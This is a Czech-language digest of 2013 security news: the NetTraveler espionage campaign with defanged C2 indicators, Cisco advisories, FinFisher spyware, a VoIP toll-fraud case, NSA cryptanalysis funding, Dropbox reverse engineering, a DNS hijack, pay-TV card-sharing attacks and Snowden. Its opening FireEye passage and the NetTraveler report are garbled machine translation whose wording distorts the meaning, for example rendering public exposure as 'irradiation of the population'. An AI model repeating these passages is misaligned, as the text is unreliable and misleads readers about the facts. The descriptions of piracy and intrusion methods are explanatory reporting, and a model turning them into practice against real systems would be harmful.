Oculus se skládá ze tří složek: Prevence hrozeb platformy - FireEye Threat Prevention Platforma řeší dnešní pokročilé počítačové útoky. Tato platforma je vybaven patentovanou Multi-Vector Virtual Execution (MVX) motor, který diriguje podpisu méně analýzu vrcholu patentované technologii virtualizace účel-postavený pro bezpečnost. MVX Motor je určen pro škálovatelné, přesné a včasné ochrany v rámci primární hrozbu vektorů, web, e-mail, a soubory. Kromě toho, jak čelit rostoucí hrozbě škodlivých mobilních aplikací, FireEye plánuje rozšířit svou MVX technologii uvolněním nové SaaS platforma s názvem FireEye Mobile Threat Prevention na začátku příštího roku. Dynamic Threat Intelligence (DTI) - FireEye je globální nasazení poskytuje společnost s bohatou hrozbách. Na hodinovém základě, FireEye zákazníci těžit z aktualizovaného hrozbách na celém světě počítačové kriminality sítí a národní aktéři. podpora a služby - FireEye chrání své zákazníky přes 24x7 celosvětové podpory ve všech hlavních oblastech po celém světě. FireEye představuje nepřetržitou ochranu služba, která umožňuje zákazníkům využít FireEye FireEye v odborných znalostí v oblasti řešení dnešních kybernetickým hrozbám a získat vhled do jejich bezpečnostní pozici ve vztahu k jejich odvětví vertikální, což jim umožňuje provádět průběžné posouzení rizik jejich organizace.
NetTraveler Is Back: The 'Red Star' APT se vrací s novým kouskům
3.9.2013 Zdroj: Kaspersky Hacking | Počítačový útok
NetTraveler, které jsme popsali v hloubce v předchozím příspěvku, je APT, aby byly zavirované stovky vysokých profilových obětí ve více než 40 zemích. Známé cíle NetTraveler (také známý jako "Travnet" nebo "Netfile") patří tibetské / ujgurské aktivisty, podniky ropného průmyslu, vědeckých výzkumných center a ústavy, vysoké školy, soukromé společnosti, vlády a vládní instituce, velvyslanectví a vojenských dodavatelů.
V průběhu minulého týdne bylo několik kopí-phishing e-maily odeslané na více Ujgurů aktivistů. Zde je příklad:
Hrubý překlad:
"Mluvčí WUC učinil následující prohlášení o masakru v zemi Karghiliq. K laskavou pozornost každého. "
Obsahuje odkaz na stránku, údajně na World Ujgurů stránkách kongresu. Nicméně, skutečný stránku odkaz vede na známou NetTraveler související doméně "weststock [dot] org".
Zde je obsah stránky přitažené za vlasy z této URL:
Tento jednoduchý HTML načte a spustí Java applet s názvem "new.jar" ( c263b4a505d8dd11ef9d392372767633 ). "New.jar" je exploit pro CVE-2013-2465, velmi nedávné chyba ve verzích Java 5, 6 a 7, která byla stanovena Oracle v červnu 2013. Je detekován a blokován produktů Kaspersky druhově jako "HEUR: Exploit.Java.CVE-2013-2465.gen".
Užitečné zatížení exploitu je soubor s názvem "file.tmp" ( 15e8a1c4d5021e76f933cb1bc895b9c2 ), který je uložen v JAR. Jedná se o klasický NetTraveler backdoor kapátko (produkty Kaspersky zablokovat jako "Trojan-Dropper.Win32.Dorifel.adyb"), který sestavuje na "Pon 30.květen 2013 03:24:13", pokud máme věřit záhlaví PE časové razítko.
Tato varianta NetTraveler připojuje k dříve neznámé velení a řízení serveru při "hxxp :/ / worldmaprsh [dot] com / GZH / nettr / filetransfer [dot] asp", pořádané na IP 198.211.18.93. IP se nachází v USA, u "Multacom Corporation" a jsou použity výhradně hostit tuto C2:
Velení a řízení server je aktivní a provozu v době psaní tohoto blogu, přijímání kradených dat z obětí.
NetTraveler je Zalévání díry útok Kromě spearphishing e-maily, zalévání děr útoky se staly další populární způsob, jak zaútočit na nic netušící oběti, které APT operátorů. Není snad žádným překvapením, že NetTraveler útoky jsou nyní používá tuto metodu. Minulý měsíc jsme zachytili a zablokoval celou řadu infekčních pokusů od známého NetTraveler související domény na "weststock [dot] org". K přesměrování se objevily přijít z jiného Ujgurů související obsah www stránek patřících k "islámské asociace východní Turkestánu":
Rychlý pohled na webu HTML kódu ukazuje injekci iframe společné na nebezpečné webové servery:
HTML stránka, na "weststock [dot] org" odkazuje IFRAME obsahoval další škodlivý aplet s názvem "ie.jar".
Závěry Bezprostředně po ozáření obyvatelstva z NetTraveler operací , útočníci vypnutí všech známých C2S a přesunula na nové servery v Číně, Hongkongu a Tchaj-wanu. Nicméně, oni také pokračovaly útoky bez překážek, stejně jako současný případ ukazuje to.
Použití exploitu Java pro CVE-2013-2465 spolu s zalévání děr útoků je nové, dosud nepoznané vývoj pro skupinu NetTraveler. To má samozřejmě vyšší úspěšnost než dokumenty e-mailové CVE-2012-0158 Exploit sužovaných, což byl oblíbený způsob útoku až do současnosti. Odhadujeme, že novější využije budou integrovány a používány proti skupinových cílů.
Doporučení, jak zůstat v bezpečí z těchto útoků:
* Aktualizace Java na nejnovější verzi, nebo pokud nechcete použít Java, odinstalujte ho. * Aktualizace Microsoft Windows a Microsoft Office na nejnovější verze. * Aktualizace veškeré další software třetích stran, jako je například Adobe Reader. * Používejte bezpečný prohlížeč, jako Google Chrome, který má rychlejší rozvoj a slepování cyklus než Internet Explorer společnosti Microsoft. * Buďte opatrní při klikání na odkazy a otevírání příloh od neznámých osob. Zatím jsme nepozorovali použití na zero-day zranitelností Skupinou NetTraveler; bránit proti těm, ačkoli záplaty nepomohou, technologie, jako AEP (Automatic Exploit Prevention) a DefaultDeny může být docela účinné v boji proti Apts .
Cisco Security Oznámení
09.02.2013 Aktualizace
"Cisco Adaptive Security Appliance (ASA) Software obsahuje chybu zabezpečení, která by mohla umožnit neověřenému vzdálenému útočníkovi zaplnit tabulku spojení v ASA zabrání nové připojení budou stanoveny prostřednictvím zařízení." [ 1 ] "Chyba zabezpečení v paměti systému, kdy provedení buď show monitoru zasedání všech nebo zobrazit monitoru relaci příkazového řádku (CLI) příkazy na Cisco Unified Computing System (UCS) 6100 Series Fabric Propojovací by mohla umožnit ověřenému, místnímu útočníkovi spustit nevracení paměti. "[ 2 ] " Chyba zabezpečení v Routing Information Protocol (RIP) procesu softwaru Cisco IOS XR by mohlo neověřenému vzdálenému útočníkovi způsobit RIP proces se zhroutí. "[ 3 ] "Chyba zabezpečení v rozhraní Web Administrator dispečery řízení Cisco Wireless LAN (WLC) by mohla umožnit ověřenému vzdálenému útočníkovi způsobit odmítnutí služby (DoS) stavu. "[ 4 ]
CD obsahuje některé nové nástroje a aktualizované skripty. Je k dispozici ve dvou verzích, 32-bit a 64-bit. Install.pdf dokument o tom, jak nainstalovat a nakonfigurovat systém je umístěn v adresáři rel_note.
Verze 7.3 obsahuje nové nástroje, GUI a databáze: polknutím , nfsen , SQueRT , ssdeep , PassiveDNS s databází, Sagan , nfdump , rrdtool, rsyslog a pf_ring .
Tato stránka obsahuje dodatečné informace, kde stáhnout ISO a dokumentace.
Existence FinFisher, komerční spyware toolkit vytvořen sídlem ve Spojeném království Gamma Group International, se v poslední době chytil pozornost veřejnosti, když se dva bezpečnostní výzkumníci z Toronta vydal výsledky analýzy FinSpy, modul, který je součástí sady nástrojů a se instaluje na PC. Vzorky pro analýzu byly poskytnuty dvěma prodemokratických aktivistů, kteří obdrželi bahrajnské je přes falešnými e-maily, a analýza ukázala, že FinSpy je velmi důkladná špionážní nástroj, který je schopen záznamu chatů, snímky obrazovek, klávesových zkratek, popadl další informace z infikovaných systémů a jejich předávání C & C servery zřízených útočníků po celém světě. Poté tento objev, Gamma Group uvedla, že neprodával žádné ze svých výrobků do Bahrajnu, a že tento vzorek výzkumníci obdrželi byl pravděpodobně odcizení nebo v důsledku reverzní inženýrství úsilí. Nyní titíž vědci - Citizen Lab bezpečnostní výzkumník Morgan Marquis-boire a Berkley počítačové vědy doktorand Bill Marczak - obdrželi vzorky, které prokázaly, že FinFisher má také složky, které mohou špehovat mobilní uživatele. Volal FinSpy Mobile, spyware záznamy hovory, textové zprávy, e-maily, stažené soubory, stisky kláves a audio zvuky přes mikrofon, zařízení 'je tiché hovory, výtažky seznamy kontaktů a používá GPS a mít přehled o poloze uživatele. Žádný mobilní uživatel bezpečné, jak se zdá, jako FinSpy Mobile je schopen ohrozit iOS, Android, BlackBerry, Windows Mobile a Symbian-run zařízení. Přesto může součást nelze nainstalovat bez zásahu uživatele, a vědci se domnívají, že cíle nakazit prostřednictvím sociálně technicky e-maily, Trojanized aplikace, nebo dokonce někdo, koho znají, který si stáhne a nainstaluje malware, aniž by uživatel věděl. "Doporučujeme, aby všichni uživatelé spustit anti-virus software, okamžitě aplikovat (legitimní) aktualizace, jakmile budou k dispozici, použijte obrazovku zámky, hesla a šifrovací zařízení (je-li k dispozici), "výzkumníci poradit . "Neutíkejte nedůvěryhodné aplikace a neumožňují přístup třetí osoby do mobilních zařízení."
Manažer bezpečnosti: Hackeři si volají za naše peníze
V naší malé evropské pobočce někdo neznámý protelefonoval stovky tisíc korun prostřednictvím služby IP telefonie.
Bezpečnost
Trouble Ticket Co řešit: Malá menší pobočka zjistila, že se někdo naboural do jejího směrovače pro IP telefonii. Akční plán: Zaktualizovat operační systém, aby se zabránilo telefonním podvodům, a posoudit konfiguraci IP telefonie v kancelářích po celém světě.
Je to již docela dlouho, co jsme u nás měli narušení bezpečnosti, které by stálo za výraznější zmínku (tedy alespoň o takovém, o němž víme). Minulý týden se však objevilo jedno, které bylo poučné i pro ostatní pobočky.
Naši malou vývojovou kancelář v jednom regionu Evropy informovala místní telekomunikační společnost, že z telefonní IP ústředny této kanceláře se aktivuje vysoký počet hovorů do země z Blízkého východu. Když jsme se na to podívali, zjistili jsme, že za pouhých 15 dnů se uskutečnily hovory v hodnotě více než půl milionu korun, a to nejen do několika zemí zmíněného regionu, ale i do Ruska, Číny a střední Ameriky.
Okamžitě jsem požádal zaměstnance naší evropské kanceláře, aby u telekomunikačního operátora zablokovali všechny podezřelé lokality, podali trestní oznámení a poslali mi kompletní konfiguraci z IP směrovače.
Ona evropská kancelář se stala součástí naší společnosti během akvizičního procesu před zhruba čtyřmi lety, tedy ještě před mým příchodem. Převzatá firma tehdy právě zakoupila nové vybavení, včetně směrovače Cisco, který dnes používá jako hlasovou bránu pro komunikaci s několika dalšími kancelářemi po celém světě. Po akvizici jsme směrovače Cisco zachovali, protože IP telefonii ve firmě využíváme opravdu intenzivně.
Když dorazila zpráva s konfigurací, předal jsem ji našim analytikům a několika kolegům, kteří jsou obeznámeni s bezpečnostním nastavením telefonních bran Cisco.
Na vině zastaralý IOS Jak se dalo čekat, v napadeném směrovači byla zastaralá verze operačního systému Cisco IOS a navíc produkt nebyl nijak konfigurován, aby se chránil před telefonními podvody. Protože směrovač nebyl ani řádně uzamčen, mohl se vnější uživatel připojit k naší telefonní bráně přes port TCP 5060, získat oznamovací tón a telefonovat.
Bohužel to nebyl jen osamocený hacker, kdo z našeho systému volal. Protokoly hovorů zachytily IP adresy z celého světa, což znamená, že „muž v pozadí“ sdělil informace o naší zranitelnosti dalším stovkám lidí. Přestože to nevíme jistě, zdá se, že naše konfigurace byla buď prodána, nebo čile obchodována na černém trhu.
Po zjištění příčin problému jsme začali pracovat na nápravě. Naplánovali jsme proces řízení změn, aby byl směrovač upgradován na nejnovější verzi IOS, která už v sobě obsahuje podporu ochrany proti telefonním podvodům, a poté jsme směrovač nakonfigurovali, aby tento ani jiné druhy telefonních podvodů dále neumožňoval.
Poučeni z událostí v této kanceláři jsme totéž udělali ve všech našich lokalitách.. Provedli jsme kontrolu veškerých telefonních bran Cisco, abychom zjistili, zda některé z nich nejsou zranitelné. Zcela očekávaně se zranitelná verze IOS zjistila u tří dalších poboček v Evropě a v jedné v USA (shodou okolností jsme všechny získali při různých akvizicích v posledních třech až čtyřech letech).
Určitá úleva Plně spolupracujeme s policií i telekomunikačním operátorem a díky tomu možná získáme zpět část z oněch mnoha set tisíc korun.
Tento incident mne však podnítil k další akci. Mám v plánu použít část svého rozpočtu na posuzování zranitelnosti a penetrační testy -- hodlám najmout renomovanou firmu na provedení kompletního vyhodnocení zranitelností našeho globálního prostředí IP telefonie -- vše od telefonů a správců volání až po zasílání zpráv či základní síťové vybavení umožňující IP telefonii.
Protože jsme v poslední době zjistili spoustu zranitelností, budu svůj scénář, který platí pro fúze a akvizice, aktualizovat, aby obsahoval důraz na posudek získávané infrastruktury IP telefonie.
Jedno z bezpečnostních opatření, které jsme okamžitě udělali, je vyhodnocení našich možností korelovat data logů volání z produktů Cisco s dalšími relevantními protokoly v rámci našeho nedávno pořízeného nástroje pro správu událostí a incidentů zabezpečení (SIEM).
USA financují vývoj „převratné“ kryptoanalýzy
Podle informací o špionážním rozpočtu USA, které pronikly na veřejnost, by měl kryptologický program v letošním roce získat 11 miliard dolarů, tedy více než pětinu z celkové částky.
Špionáž | Bezpečnost
Část z těchto peněz je určena na hledání slabin v šifrovacích systémech, které by umožnily neoprávněný průnik do šifrované komunikace. Nejedná se přitom pouze o internet, ale i o mobilní sítě a další druhy komunikace. Alespoň podle jednoho z dokumentů, které tisku poskytl Edward Snowden.
Oním dokumentem je návrh rozpočtu na fiskální rok 2013 pro Národní výzvědný program, do kterého je zapojeno 16 státních organizací s celkem 107 000 zaměstnanci. Celý dokument má podle deníku Washington Post, který jej má k dispozici, 178 stran. Z nich deník otiskl 17 a doplnil je o prohlášení ředitele americké národní výzvědné služby Jamese Clappera.
Clapper ve svém prohlášení zmiňuje primární oblasti, do kterých mají být směřovány investice. Jednou z nich je Signální špionáž (SIGINT), o které napsal: „Posilujeme naši podporu tajným možnostem SIGINT shromažďovat údaje o vysoce důležitých cílech včetně vedoucích zahraničních cílů. Také jsme se investovali do průkopnických kryptoanalytických funkcí, které dokáží prolomit nepřátelské šifrování a využití internetového provozu.“
Kryptoanalýza je věda zabývající se analýzou šifrovacích systémů a hledáním jejich slabých míst, která mohou umožnit získání obsahu šifrované zprávy bez znalosti šifrovacího klíče. Podle již zveřejněných dokumentů, které poskytl Snowden, shromažďuje NSA hromadně internetovou komunikaci ve spolupráci s americkými komunikačními a technologickými firmami. Americké společnosti provozující páteřní komunikační sítě a infrastrukturu internetu získávají od státu každoročně miliony dolarů za to, že NSA tento sběr dat umožňují, a to jak v optických vedeních, tak v běžné síťové infrastruktuře.
Podle nově zveřejněného dokumentu se tak děje v rámci projektu „Přístup ke korporátním partnerům“, který by měl ve fiskálním roce 2013 přijít americké daňové poplatníky na 278 milionů dolarů. Zkrátka nepřijdou ani někteří zahraniční „partneři“ amerických špionů, kteří se v úhrnu mohou těšit na 56,6 milionu dolarů.
I když z dokumentu není jasné, nakolik kryptoanalytici v amerických službách ve svém výzkumu pokročili, alespoň to potvrzuje domněnky, že kryptologie a kryptoanalýza patří mezi nejdůležitější obory při špehování síťové komunikace.
Oněch 11 miliard dolarů určených na Konsolidovaný kryptologický program (CCP), je druhým nejštědřeji dotovaným projektem, hned za náklady na CIA, které letos činí bezmála 15 miliard dolarů.
Vývojáři pronikli do DropBoxu a ukázali cestu k datům uživatelů
Bezpečnost DropBoxu není 100%, lze obejít i jeho dvoufázové ověřování a vstoupit do komunikace SSL mezi servery DropBoxu.
Hacking | Zranitelnosti
V rámci konference USENIXU 2013 byl uveřejněn článek dvou vývojářů zaměřený na techniky překonávající zabezpečení DropBoxu. Podle autorů jsou „tyto techniky poměrně obecné a věříme, že v budoucnosti pomohou vývoji softwaru, testování a dalšímu výzkumu problémů bezpečnosti.“
DropBox, který má dnes více než 100 milionů uživatelů, kteří nahrávání více než miliardu souborů denně, prohlašuje, že článek neukázal na žádnou konkrétní zranitelnost jeho serverů.
Podle mailu, který zaslal tiskový mluvčí společnosti redakci amerického Computerworldu: „Oceňujeme příspěvky výzkumníků a vůbec všech, kteří pomáhají udržovat DropBox bezpečným. V konkrétním případě, který byl uveřejněn, by muselo nejprve dojít k průniku do počítače uživatele tak, že by byl zneužitelný celý, nikoli pouze pro účet DropBoxu.“
Oba autoři textu, Dhiru Kholia, (z projektu Openwall) a Przemyslaw Wegrzyn (CodePainters) tvrdí, že se jim podařilo pomocí reverzního inženýrství získat zdrojový kód DropBoxu, jehož aplikace byla napsaná v jazyce Python. „Naše práce ukazuje interní API používaná klientem Dropboxu a umožňuje jednoduše napsat vlastní, přenositelnou verzi klienta. Dále předvádíme, jak lze obejít dvoufázové ověřování DropBoxu a jak získat přístup k datům uživatele. Jde o novou obecnou techniku, jak analyzovat aplikace napsané v Pythonu, která se neomezuje pouze na produkty DropBoxu.“
V publikovaném textu se dále detailně popisuje, jak byli autoři schopni rozbalit, rozšifrovat a dekompilovat DropBox. Samozřejmě, jakmile je k dispozici vlastní verze zdrojového kódu, lze dále studovat, jak aplikace funguje. Výsledkem je schopnost získávat data z tunelu SSL, kterým komunikuje klient DropBoxu, ale daná metoda byla úspěšně otestována i na dalších komerčních řešeních.
Použita byla takzvaná monkey-patch, což je metoda rozšiřování nebo modifikace spuštěného kódu interpretovaných jazyků beze změny původního zdrojového kódu. V tomto případě konkrétní implementace dokázala upravit chování klienta DropBoxu, aniž by tento klient dokázal zjistit průnik do vlastního kódu nebo odesílaných dat.
„Doufáme, že naše práce bude inspirovat komunitu věnující se bezpečnosti IT, aby napsala vlastního klienta pro službu DropBoxu, s otevřeným zdrojovým kódem, který by pomohl i vlastní platformě DropBoxu a jejím uživatelům. Doufáme, že na naši práci navážou další výzkumy i pro jiná cloudová úložiště.“
NY Times a Twitter opět pod útokem zločinců
K útokům na webové stránky deníku New York Times a sociální síť Twitter se přihlásila Syrská elektronická armáda.
Hacking
Útočníkům se podařilo pozměnit registrační údaje domén amerických internetových deníků NY Times a Huffington Post, čímž je odstavili na několik hodin z provozu. Napadena byla také mikroblogovací služba Twitter, která ale zůstala funkční.
Za útokem podle všeho stojí skupina, která si přezdívá Syrská elektronická armáda, což je organizace podporující syrského prezidenta Bašára al-Asada.
Jde o dosud největší útok provedený touto skupinou. V uplynulých měsících se hackeři zaměřili na velké mediální společnosti jako Financial Times, Washington Post, CNN nebo BBC. Poslední útok měl však mnohem déle trvající následky.
Napadené domény měla ve své správě australská společnost Melbourne IT. Útočníci získali přístup do jejího systému a změnili nastavení DNS. Pokud jste tak do adresního řádku prohlížeče zadali například nytimes.com, místo stránek amerického deníku jste se dostali na web Syrské elektronické armády.
V případě Twitteru hackeři zneužili doménu twimg.com, kterou sociální síť používá pro ukládání obrázků. Zatímco Twitter tak zůstal v provozu, některé stránky na twimg.com se nezobrazovaly správně.
Australský registrátor dává zneužití adres za vinu třetí straně – firmě, která přes systém společnosti prodává domény. Od této firmy měla Syrská elektronická armáda získat přístupové údaje k editaci DNS. „Pokud máte platné jméno a heslo, náš systém předpokládá, že jste oprávněný majitel a uživatel doménového jména,“ řekl ředitel Melbourne IT Theo Hnarakis.
V době výpadku pokračoval New York Times v publikování svých článků prostřednictvím profilu na Facebooku. Společnost mezitím varovala své zaměstnance, aby byly opatrní při e-mailové komunikaci, dokud se situace nevyřeší.
Facebook zveřejnil údaje o informacích předaných vládám
Vlády z celého světa podaly během prvních šesti měsíců letošního roku přibližně 38 000 žádostí o osobní informace uživatelů Facebooku.
Špionáž
Říká to alespoň první zpráva, kterou na toto téma Facebook v úterý vydal. Zpráva se jmenuje Globální zpráva o úředních žádostech (Global Government Request Report) a zveřejňuje detaily o oficiálních žádostech, které podaly vlády ze 74 zemí.
Nejvíce žádostí společnosti přišlo ze Spojených států, které si vyžádaly informace o 20 až 21 tisících lidí (Spojené státy neumožňují společnostem zveřejnit přesné počty, tak mohl Facebook uvést pouze toto rozpětí). Velká Británie chtěla informace o 2 337 uživatelích a Česká republika podala 10 žádostí týkajících se 13 uživatelů.
„I nadále budeme agresivně obhajovat lepší zpřístupnění těchto informací,“ oznámila společnost. „Tato zpráva určitě nebude naše poslední,“ napsal právník společnosti Colin Stretch. „Doufáme, že v dalších zprávách budeme moci poskytnout bližší informace,“ dodal. Společnost plánuje podobné zprávy vydávat dvakrát ročně a doufá, že to uživatelům osvětlí složité procesy, které jsou s vydáváním informací spojeny.
Důvod žádostí Facebook nezveřejnil, pouze rozdělil údaje podle zemí, zveřejnil kolik žádostí která země podala a kolika uživatelů se týkaly. Poskytnul také údaje o tom, kolik žádostí bylo schváleno. Velké Británii vyhověl Facebook v 68 % případů, zatímco úřadům z USA podal požadované informace v 79 % případů a České republice v 60 %.
Nejzajímavější je pohled na země, ve kterých probíhají občanské nepokoje. Turecko podalo 96 žádostí, týkajících se 173 uživatelů a Facebook údaje předal ve 45 případech, společnost trvá na tom, že se jednalo o zločiny spojené s ohrožením dětí a o nouzové vymáhání práva. Egyptská vláda podala žádostí 8, žádné údaje však nezískala.
Organizace Privacy International zprávu sice uvítala, ale považuje to od Facebooku pouze za prázdné gesto bez valného významu, které s Facebookem samotným nemá nic společného. „Od chvíle, kdy byly zveřejněny a analyzovány dokumenty, které poskytl Edward Snowden, už víme, jaké informace o nás vlády sbírají, a jsme si vědomi hrozivé reality, že vlády nepotřebují prostředníky jako Facebook, Google nebo Microsoft k tomu, aby naše data získaly.“
Bezpečnost sítí: Analogové a digitální vysílání II
Digitální vysílání umožňuje operátorům šifrovat přenosy televize a rozhlasu a adresovat každého jednoho zákazníka pomocí jím vydané smart karty.
Zabezpečení
Konfigurace digitálního přenosového řetězce s implementovaným podmíněným přístupem (CA) je extrémně flexibilní a umožňuje operátorům libovolně konfigurovat k jakým kanálům má zákazník přístup a také ve kterých okamžicích ho má a ve kterých naopak ne.
Realita ovšem není tak jednoduchá, jelikož operátor ve spolupráci s poskytovatelem CA systému se snaží maximálně zamezit neautorizovanému přístupu, tedy tomu bez originální a zaplacené smart karty.
Jednou z technik je časové omezení autorizací uložených na kartě. Jinými slovy, neobnoví-li operátor předplatné na kartě, časem karta přestane poskytovat klíče. Pro tuto funkcionalitu je ovšem třeba, aby operátor byl schopen vzdáleně modifikovat obsah karty. K tomu slouží speciální typ servisních dat přenášený ve streamu. Tato data obsahují zprávy pro smart kartu, které její procesor zpracuje a zařídí se podle nich. Zde leží jedno z obchodních tajemství poskytovatelů CA systémů a také jedno z potenciálních míst k napadení.
Pokud se podaří vygenerovat a poslat kartě zprávu o prodloužení předplatného, mohl by zákazník sledovat programy, které nemá zaplaceny. Zprávy jsou ovšem šifrovány v zařízeních s podmíněným přístupem pomocí přísně střežených klíčů a pak jsou dešifrovány klíčem uloženým v kartě. Jejich falšování je prakticky nemožné bez znalosti klíčů. Vzhledem k omezenému výpočetnímu výkonu procesoru karty je ovšem zpráva šifrována nejen kartou ale i přijímačem stejně jako u audio-video streamu. To aby bylo lepší zabezpečení bez vysokých nároků na procesor karty.
Jedním z oblíbených způsobů útoku na smart kartu, byl tzv. blocker. Šlo o zařízení vložené mezi kartu a CA modul, jež analyzovalo komunikaci mezi kartou a modulem a zablokovalo přenos určitých typů zpráv. Většinou zprávy znehodnocující nebo blokující kartu či omezující předplatné.
Integrovaná bezpečnost Poskytovatelé systémů CA se tomuto snaží bránit například vkládáním tzv. bezpečnostního elementu přímo na hlavní procesorový čip přijímače. Mimo jiné slouží k jedinečné identifikaci přijímače a také pomáhá při zabezpečení citlivých dat přímo v paměti, jež může být přečtena hackerem. Další účinnou obrannou technikou některých poskytovatelů CA je používání rozmanitých technik zabezpečení a šifrování pro různé zákazníky a trhy. Tím je eliminován problém při prolomení CA u jednoho operátora a zpřístupnění nabídky všech, kteří daný systém používají.
Poskytovatelé CA navíc existujícím zákazníkům systémy postupně mění, čímž opět efektivně brání napadení, jelikož omezují dobu, po kterou je systém k dispozici na trhu. Koncový zákazník většinou obdrží od operátora novou přístupovou kartu, případně celý nový modul CA.
Velmi oblíbený způsob napadení celého řetězce je tzv. sdílení karet (card sharing). Jde o zařízení, které emuluje chování karty v přijímači, přičemž na klíče se dotazuje přímo originální karty zasunuté ve sdílené čtečce. Emulátor však umožňuje i ostatním emulátorům přístup, tím zákazník efektivně nemusí vlastnit kartu a stačí mu pouze vzdálený přístup ke sdílené kartě poskytující klíče.
Kolik klíčů, tolik… Způsobů boje s touto zranitelností je několik. Jednou z nich je omezení počtu klíčů poskytnutých kartou za jednotku času. Tím se zásadně omezí počet přijímačů sdílejících jednu kartu bez vlivu na legální uživatele. Další možností je využití bezpečnostního elementu na čipu a zašifrování kanálu mezi procesorem a kartou klíčem, který je unikátní pro daný přijímač.
Modul CA může být přítomen ve dvou základních formách, jako nedílná součást softwaru a hardwaru přijímače nebo jako fyzický modul připojený přes tzv. common interface (CI).
CI je standardizované rozhraní pro připojení modulů CA a v současné době je velmi oblíbené výrobci přijímačů, kteří tímto jednoduše připraví své zařízení na příjem placeného vysílání.
Zákazník pouze vloží modul CA s kartou, obojí získané od poskytovatele, a může sledovat šifrované vysílání. Případný bezpečnostní element je součástí fyzického modulu CA a karta je tudíž párována s tímto modulem. Někteří poskytovatelé CA vidí CI jako možnou bránu napadení jejich systému, a tedy finanční ztrátu, a proto vyvíjejí nadstavbové zabezpečující funkce do modulu CA, které brání útočníkům v jeho napadení přes rozhraní CI.
Šifrované nahrávání V současné době je velmi oblíbená funkce umožňující nahrávat digitální vysílaní na pevný disk. Zde ovšem vstupují do hry majitelé práv k vysílaným pořadům, a ti chtějí mít možnost rozhodovat o tom, zda daný pořad bude možno zaznamenat či jak dlouho bude nahrávka použitelná. Pochopitelně nahrávka bude použitelná pouze v přijímači, ve kterém byla pořízena.
Toto opět řeší systémy CA poskytovatelů. Digitální signál nese informaci pro smart kartu, zda je možno daný pořad nahrát, případně zda je nějaký limit použitelnosti nahrávky. Další krok je zajištění, aby nahrávka nebyla uložena v otevřené formě na disku. Zákazník by totiž mohl disk vyjmout a v jiném zařízení nahrávku získat a například sdílet na internetu.
Uložení přímo šifrovaného streamu není řešení, jelikož šifrovací klíče se poměrně rychle mění, a tudíž nahrávka by již po málo minutách byla nepoužitelná. Přijímač tedy musí nahrávku dekódovat pomocí aktuálního klíče a pak ji znovu zakódovat permanentním klíčem a tento uložit do karty pro pozdější přehrání. Tato funkcionalita v současné době není k dispozici ve variantě vloženého modulu CA do rozhraní CI z důvodu nedostatečné podpory zabezpečení nahrávek rozhraním CI.
Možnost nahrávání na pevný disk u jednoduchých přijímačů neumožňující příjem šifrovaných pořadů je poměrně obvyklá. Různí výrobci se staví k zabezpečení nahrávek různě. Někteří ponechávají nahrávky zcela volně přístupné, jiní používají speciální formát disku nečitelný běžnými prostředky. Jiní šifrují nahrávky, přičemž je umožňují přehrát pouze na stejném zařízení, kde byla nahrávka pořízena.
Další funkce je sledování pořadu s časovým posunem. Program je zde ukládán na disk, odkud je současně přehráván se zpožděním. Většinou je tato nahrávka nechráněna, což může být ve specifických případech použito k napadení zabezpečení a získání záznamu.
Anonymous reagují na tvrzení FBI o jejich likvidaci
Skupina hackerů Anonymous uvolnila tisíce citlivých údajů jen několik dní po tom, co FBI vydala prohlášení o jejich likvidaci.
Hacking
Minulý týden Austin Berglas, ředitel kybernetické divize FBI v New Yorku, poskytl rozhovoru novinám Huffington Post. Podle něj vyšetřování FBI vedlo k řadě zatčení mezi členy Anonymous a k omezení jejich činnosti. „Hnutí sice existuje a můžete vidět nějaké jejich příspěvky na Twitteru, ale jeho členy neuslyšíte chlubit se velkými průniky. K žádným nedochází, protože se nám podařilo pacifikovat největší hráče...“
První reakcí na Twitteru, který je jakýmsi hlavním komunikačním kanálem většiny Anonymous, byl smích a řada vtipů, mnoho z nich srovnávalo podobné tvrzení s prohlášením Geroge W. Bushe v roce 2003 o dokončení mise v Iráku, které bylo poněkud předčasné a po kterém teprve došlo v konfliktu k většině úmrtí vojáků i civilistů.
Pro většinu pozorovatelů aktivit FBI a hackerů nebyl obsah rozhovoru se speciálním agentem velkým překvapením. Podle Gabrielly Colemanové, antropoložky specializující se na hackerství a aktivismus „Bitva mezi hackery a FBI se táhne velmi dlouho. A zatímco Anonymous se mohou vyjádřit kdykoliv, FBI musela být velmi opatrná a držet se zpátky. Dalo se čekat, že dříve nebo později se někdo z agentury rozhodne vystoupit ze svého zákopu a bude bojovat za její kredit.“
je pravda, že FBI dosáhla velkých úspěchů, zadržela řadu členů skupin LuizSec a AntiSec, které především v létě 2011 úspěšně útočily na řadu vládních organizací. Ale i přes vlastní prohlášení, že například LuizSec tvoří pouze sedm členů, bylo jejich podzemní hnutí podstatně rozsáhlejší.
To se ukázalo vzápětí po tom, co noviny přinesly zprávu o úspěších FBI. Anonymous reagovali uveřejněním řady dokumentů s tisící osobních informací o pracovních vládních agentur, včetně jejich telefonů. Na napadený web nahráli kompletní seznam pracovníků Banky federálních rezerv USA. Ta reagovala tvrzením, že tato data jsou zastaralá a pravděpodobně pocházejí z únorového útoku na systémy banky.
To samozřejmě nic nemění na faktu, že banka byla úspěšně napadena a že – stejně jako v jiných případech – se o úniku dat mohou organizace dozvědět mnohem později, pokud vůbec. Pro FBI je to zase poučením, že na vítězný taneček je vždy času dost. Anonymous i jiné skupiny nejsou jednoduše zasažitelné organizace, jejich aktivity jsou diverzifikované a svou pozornost mohou kdykoli zaměřit jinam.
Co se týká dnešní veřejnosti, tu v tomto okamžiku více než síťová bezpečnost pálí lidská práva a ochrana soukromí před aktivitou jistých vládních agentur. A kdybychom si mohli dovolit být ještě trochu více paranoidní, náhlé vítězné výkřiky FBI mohou být jen projevem pokračující snahy Spojených států od vlastních pochybných aktivit.
Efekt Snowden zpochybňuje možnost zabezpečení dat
Únik citlivých údajů, jako v případě kauzy Edvarda Snowdena, znejistil bezpečnostní konzultanty a oddělení všech firem. Mohou si v ochraně citlivých korporátních dat vést lépe než americká vláda?
Šifrování
Realita ukázala a nadále ukazuje, že stále rostoucí popularita různých bezpečnostních certifikací a hon personálních agentur na experty bezpečnost nevyřeší a zpřísňování trestů (viz 35 let pro Bradleyho Manninga, který stál za únikem dat do Wikileaks) není pro pachatele dostatečnou hrozbou, pokud je cena dostatečně vysoká.
